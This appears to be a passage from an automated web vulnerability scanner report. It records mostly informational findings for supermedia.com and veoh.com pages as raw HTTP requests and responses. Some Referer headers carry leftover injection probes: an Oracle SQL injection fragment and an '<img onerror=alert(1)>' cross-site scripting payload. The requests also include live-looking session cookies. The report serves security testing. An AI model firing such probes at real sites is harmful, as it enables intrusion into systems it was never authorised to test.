Cookie: s_cc=true; JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; trafficSource="SP198c8\"; s_sq=%5B%5BB%5D%5D; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; CstrStatus=U; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296762423|check#true#1296760623;

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:29:52 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>Local Search Marketing | SuperMedia.com Advertising</title>



...[SNIP]...

27.89. https://www.supermedia.com/packaged-solutions  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.supermedia.com
Path:   /packaged-solutions

Request

GET /packaged-solutions HTTP/1.1
Host: www.supermedia.com
Connection: keep-alive
Referer: https://www.supermedia.com/spportal/spportalFlow.do(108)%7C%7Cchr(101)%7C%7Cchr(109)%7C%7Cchr(109)%7C%7Cchr(97)+from+DUAL)))%7C%7C'
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; trafficSource="SP198c8\"; CstrStatus=U; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; mbox=session#1296759528614-838261#1296761924|check#true#1296760124; s_cc=true; undefined_s=First%20Visit; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:09:29 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Connection: close
Cache-Control: private
Content-Length: 24328


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>Advertising Packages for Businesses | SuperMedia.com Advertising</title>



...[SNIP]...

27.90. https://www.supermedia.com/packaged-solutions/auto-dealer-packages  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.supermedia.com
Path:   /packaged-solutions/auto-dealer-packages

Request

GET /packaged-solutions/auto-dealer-packages HTTP/1.1
Host: www.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; trafficSource="SP198c8\"; s_sq=%5B%5BB%5D%5D; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; CstrStatus=U; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296762423|check#true#1296760623;

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:32:43 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>Auto Dealer Marketing Packages | SuperMedia.com Advertising</title>



...[SNIP]...

27.91. https://www.supermedia.com/packaged-solutions/business-profile-packages  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.supermedia.com
Path:   /packaged-solutions/business-profile-packages

Request

GET /packaged-solutions/business-profile-packages HTTP/1.1
Host: www.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; trafficSource="SP198c8\"; s_sq=%5B%5BB%5D%5D; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; CstrStatus=U; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296762423|check#true#1296760623;

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:32:35 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>Business Profile Packages | SuperMedia.com Advertising</title>



...[SNIP]...

27.92. https://www.supermedia.com/packaged-solutions/multi-product-packages  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.supermedia.com
Path:   /packaged-solutions/multi-product-packages

Request

GET /packaged-solutions/multi-product-packages HTTP/1.1
Host: www.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; trafficSource="SP198c8\"; s_sq=%5B%5BB%5D%5D; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; CstrStatus=U; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296762423|check#true#1296760623;

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:32:30 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>Multi-Product Marketing Packages | SuperMedia.com Advertising</title>



...[SNIP]...

27.93. https://www.supermedia.com/press  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.supermedia.com
Path:   /press

Request

GET /press HTTP/1.1
Host: www.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; trafficSource="SP198c8\"; s_sq=%5B%5BB%5D%5D; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; CstrStatus=U; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296762423|check#true#1296760623;

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:32:44 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>SuperMedia Press Releases | SuperMedia.com Advertising</title>



...[SNIP]...

27.94. https://www.supermedia.com/print-advertising/white-pages  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.supermedia.com
Path:   /print-advertising/white-pages

Request

GET /print-advertising/white-pages HTTP/1.1
Host: www.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; trafficSource="SP198c8\"; s_sq=%5B%5BB%5D%5D; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; CstrStatus=U; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296762423|check#true#1296760623;

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:30:17 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>White Pages Advertising | SuperMedia.com Advertising</title>



...[SNIP]...

27.95. https://www.supermedia.com/print-advertising/yellow-pages  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.supermedia.com
Path:   /print-advertising/yellow-pages

Request

GET /print-advertising/yellow-pages HTTP/1.1
Host: www.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; trafficSource="SP198c8\"; s_sq=%5B%5BB%5D%5D; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; CstrStatus=U; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296762423|check#true#1296760623;

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:30:16 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>Yellow Pages Advertising | SuperMedia.com Advertising</title>



...[SNIP]...

27.96. https://www.supermedia.com/reputation-monitoring  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.supermedia.com
Path:   /reputation-monitoring

Request

GET /reputation-monitoring HTTP/1.1
Host: www.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; trafficSource="SP198c8\"; s_sq=%5B%5BB%5D%5D; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; CstrStatus=U; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296762423|check#true#1296760623;

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:30:11 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>Reputation Monitoring | SuperMedia.com Advertising</title>



...[SNIP]...

27.97. https://www.supermedia.com/social-responsibility  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.supermedia.com
Path:   /social-responsibility

Request

GET /social-responsibility HTTP/1.1
Host: www.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; trafficSource="SP198c8\"; s_sq=%5B%5BB%5D%5D; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; CstrStatus=U; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296762423|check#true#1296760623;

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:32:53 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>SuperMedia Social Responsibility | SuperMedia.com Advertising</title>



...[SNIP]...

27.98. https://www.supermedia.com/spportal/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.supermedia.com
Path:   /spportal/

Request

GET /spportal/ HTTP/1.1
Host: www.supermedia.com
Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: trafficSource="SP198c8\"; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; JSESSIONID=CD1B75B428F192D4B130C351A3081BAE.app2-a1; CstrStatus=RVU; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a42378b; mbox=session#1296783972284-771336#1296786095|check#true#1296784295; s_cc=true; s_sq=%5B%5BB%5D%5D; undefined_s=First%20Visit

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Fri, 04 Feb 2011 01:52:36 GMT
Content-Type: text/html;charset=UTF-8
Connection: close
Cache-Control: private
Content-Length: 30864


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>Small Business Marketing and Internet Advertising | SuperMedia.com</title>



...[SNIP]...

27.99. https://www.supermedia.com/spportal/404.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.supermedia.com
Path:   /spportal/404.jsp

Request

GET /spportal/404.jsp HTTP/1.1
Host: www.supermedia.com
Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; trafficSource="SP198c8\"; CstrStatus=U; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; mbox=session#1296759528614-838261#1296761701|check#true#1296759901; s_cc=true; s_sq=%5B%5BB%5D%5D; undefined_s=First%20Visit

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:03:39 GMT
Content-Type: text/html;charset=UTF-8
Connection: close
Cache-Control: private
Content-Length: 20820


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>Online Advertising : Superpages Small Business Online Advertising</title>



...[SNIP]...

27.100. https://www.supermedia.com/spportal/landingpages.do  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.supermedia.com
Path:   /spportal/landingpages.do

Request

GET /spportal/landingpages.do?splash=401 HTTP/1.1
Host: www.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; trafficSource="SP198c8\"; s_sq=%5B%5BB%5D%5D; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; CstrStatus=U; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296762423|check#true#1296760623;

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:28:48 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Content-Length: 5028
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<!-- UI framework designed and implemented by Advertiser Portal UI Team -->

<title>SuperMedia
...[SNIP]...

27.101. https://www.supermedia.com/superguarantee/join  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.supermedia.com
Path:   /superguarantee/join

Request

GET /superguarantee/join HTTP/1.1
Host: www.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; trafficSource="SP198c8\"; s_sq=%5B%5BB%5D%5D; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; CstrStatus=U; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296762423|check#true#1296760623;

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:34:14 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Connection: close


   <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

   <!-- UI framework designed and implemented by Advertiser Portal UI Team -->

...[SNIP]...

27.102. https://www.supermedia.com/support/contact-us  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.supermedia.com
Path:   /support/contact-us

Request

GET /support/contact-us HTTP/1.1
Host: www.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; trafficSource="SP198c8\"; s_sq=%5B%5BB%5D%5D; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; CstrStatus=U; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296762423|check#true#1296760623;

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:33:42 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>Contact SuperMedia | SuperMedia.com Advertising</title>



...[SNIP]...

27.103. https://www.supermedia.com/support/site-map  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.supermedia.com
Path:   /support/site-map

Request

GET /support/site-map HTTP/1.1
Host: www.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; trafficSource="SP198c8\"; s_sq=%5B%5BB%5D%5D; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; CstrStatus=U; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296762423|check#true#1296760623;

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:33:41 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>SuperMedia Site Map | SuperMedia.com Advertising</title>



...[SNIP]...

27.104. https://www.supermedia.com/trust/privacy-security  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.supermedia.com
Path:   /trust/privacy-security

Request

GET /trust/privacy-security HTTP/1.1
Host: www.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; trafficSource="SP198c8\"; s_sq=%5B%5BB%5D%5D; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; CstrStatus=U; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296762423|check#true#1296760623;

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:33:50 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>SuperMedia Privacy Policy | SuperMedia.com Advertising</title>



...[SNIP]...

27.105. https://www.supermedia.com/trust/social-media-content-disclaimer  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.supermedia.com
Path:   /trust/social-media-content-disclaimer

Request

GET /trust/social-media-content-disclaimer HTTP/1.1
Host: www.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; trafficSource="SP198c8\"; s_sq=%5B%5BB%5D%5D; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; CstrStatus=U; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296762423|check#true#1296760623;

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:34:07 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>Social Media Content Disclaimer | SuperMedia.com Advertising</title>



...[SNIP]...

27.106. https://www.supermedia.com/trust/terms-of-use  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.supermedia.com
Path:   /trust/terms-of-use

Request

GET /trust/terms-of-use HTTP/1.1
Host: www.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; trafficSource="SP198c8\"; s_sq=%5B%5BB%5D%5D; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; CstrStatus=U; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296762423|check#true#1296760623;

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:33:53 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>Terms of Use | SuperMedia.com Advertising</title>



...[SNIP]...

27.107. https://www.supermedia.com/video-ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.supermedia.com
Path:   /video-ads

Request

GET /video-ads HTTP/1.1
Host: www.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; trafficSource="SP198c8\"; s_sq=%5B%5BB%5D%5D; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; CstrStatus=U; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296762423|check#true#1296760623;

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:30:08 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>Video Ads | SuperMedia.com Advertising</title>


<li
...[SNIP]...

27.108. https://www.supermedia.com/web-design  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.supermedia.com
Path:   /web-design

Request

GET /web-design HTTP/1.1
Host: www.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; trafficSource="SP198c8\"; s_sq=%5B%5BB%5D%5D; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; CstrStatus=U; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296762423|check#true#1296760623;

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:30:38 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>Web Site Design | SuperMedia.com Advertising</title>



...[SNIP]...

27.109. https://www.supermedia.com/web-hosting  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.supermedia.com
Path:   /web-hosting

Request

GET /web-hosting HTTP/1.1
Host: www.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; trafficSource="SP198c8\"; s_sq=%5B%5BB%5D%5D; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; CstrStatus=U; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296762423|check#true#1296760623;

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:31:40 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>Small Business Web Hosting | SuperMedia.com Advertising</title>



...[SNIP]...

27.110. https://www.supermedia.com/web-sites  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.supermedia.com
Path:   /web-sites

Request

GET /web-sites HTTP/1.1
Host: www.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; trafficSource="SP198c8\"; s_sq=%5B%5BB%5D%5D; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; CstrStatus=U; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296762423|check#true#1296760623;

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:30:05 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>Business Web Sites | SuperMedia.com Advertising</title>



...[SNIP]...

27.111. https://www.thumbshots.com/Products/ThumbshotsImages/IntegrationCode.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.thumbshots.com
Path:   /Products/ThumbshotsImages/IntegrationCode.aspx

Request

GET /Products/ThumbshotsImages/IntegrationCode.aspx HTTP/1.1
Host: www.thumbshots.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: language=en-US; .THUMBSHOTSCOMASPXANONYMOUS=3usfLnL6ywEkAAAAYzEyMGFiNzgtNzI2ZS00ZjEwLWJmM2EtOWEzOGJlOGE0Y2Y30;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 35926
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: language=en-US; path=/; HttpOnly
X-Powered-By: ASP.NET
Date: Thu, 03 Feb 2011 20:30:39 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en-US" lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<h
...[SNIP]...

28. Multiple content types specified  previous  next
There are 2 instances of this issue:

Issue background

If a web response specifies multiple incompatible content types, then the browser will usually analyse the response and attempt to determine the actual MIME type of its content. This can have unexpected results, and if the content contains any user-controllable data may lead to cross-site scripting or other client-side vulnerabilities.

In most cases, the presence of multiple incompatible content type statements does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing a message body, the application should include a single Content-type header which correctly and unambiguously states the MIME type of the content in the response body.


28.1. http://ll-appserver.veoh.com/scripts/veoh.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ll-appserver.veoh.com
Path:   /scripts/veoh.js

Issue detail

The response contains multiple Content-type statements which are incompatible with one another. The following statements were received:

Request

GET /scripts/veoh.js?version=AFrontend.5.5.4.1038 HTTP/1.1
Host: ll-appserver.veoh.com
Proxy-Connection: keep-alive
Referer: http://www.veoh.com/browse/videos/category/action_adventure2e455%3Cimg%20src%3da%20onerror%3dalert(1)%3Ecd67645eb41/watch/v18978294NGnK88j8/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
